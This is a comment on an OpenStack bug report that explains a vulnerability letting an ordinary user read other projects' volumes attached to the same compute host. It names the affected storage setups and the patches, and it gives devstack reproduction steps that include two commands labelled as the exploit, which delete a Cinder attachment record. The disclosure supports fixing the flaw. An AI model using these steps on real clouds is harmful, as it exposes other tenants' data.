Comment 57 for bug 2004555

Hi Jeremy,

There are multiple cases/scenarios captured in this bug:

- User exploitable scenario.
- Unintentional scenarios that can happen after destroying a VM with an
  attached volume fails to cleanly detach the volume.
- Other scenarios.

The summary of the user exploitable vulnerability would be something like:

A normal user can get access other users/projects volumes that are connected to
the same compute host where they are running an instance.

This issue doesn't affect every OpenStack deployment, for the exploit to
work there needs to be the right combination of nova configuration,
storage transport protocol, cinder driver approach to mapping volumes,
and storage array behavior.

I don't have access to all storage types supported by OpenStack, so I've
only looked into: iSCSI, FCP, NVMe-oF, and RBD.

It is my believe that this only affects SCSI based transport protocols
(iSCSI and FCP) and only under the following conditions:

- For iSCSI the Cinder driver needs to be using what we call shared
  targets: the same iSCSI target and portal tuple is used to present
  multiple volumes on a compute host.

- For FCP it depends on the storage array:
  - Pure: Affected.
  - 3PAR: Unaffected, because it sends the "Power-on" message that
    triggers a udev rule that tells multipathd to make appropriate
    changes.

The way to reproduce the issue is very straightforward, it's all about
telling Cinder to delete an attachment record from a volume attached to
a VM instead of doing the detachment the right way via Nova. Then when
the next volume from that same backend is attached to the host our VM
will have access to it.

I'll give the steps using a devstack deployment, but the same would
happen on a Triple-O deployment.

The only pre-requirement is that Cinder is configured to use one of the
storage array and driver combinations that is affected by this, as this
happens both in single paths as well as multipath attachments.

Steps for the demo user to have access to a volume owned by the admin
user to have access :

  $ . openrc demo demo
  $ nova boot --flavor cirros256 --image cirros-0.5.2-x86_64-disk --nic none myvm
  $ cinder create --name demo 1
  $ openstack server add volume myvm demo

  # The next 2 lines are the exploit which delete the attachment record
  $ attach_id=`openstack --os-volume-api-version=3.33 volume attachment list -c ID -f value`
  $ cinder --os-volume-api-version=3.27 attachment-delete $attach_id

  $ . openrc admin admin
  $ nova boot --flavor cirros256 --image cirros-0.5.2-x86_64-disk --nic none admin_vm
  $ cinder create --name admin 1
  $ openstack server add volume admin_vm admin

  # Both VMs use the same volume, so the demo VM can read the admin volume
  $ sudo virsh domblklist instance-00000001
  $ sudo virsh domblklist instance-00000002

The patches that have been submitted are related to the different
scenarios/cases described before:

- User exploitable scenario ==> Cinder patch
- Unintentional scenarios that can happen after destroying a VM with an
  attached volume fails to cleanly detach the volume ==> Nova and small
  os-brick patch
- Other scenarios ==> Huge os-brick patch

The "recheck_wwid yes" option in multipath.conf (mentioned in the bug
is something that can be done in the open afterwards) could help in
some scenarios, but without the huge os-brick patch it could also lead
to an instance attaching the wrong multipath device.

Hope that helps.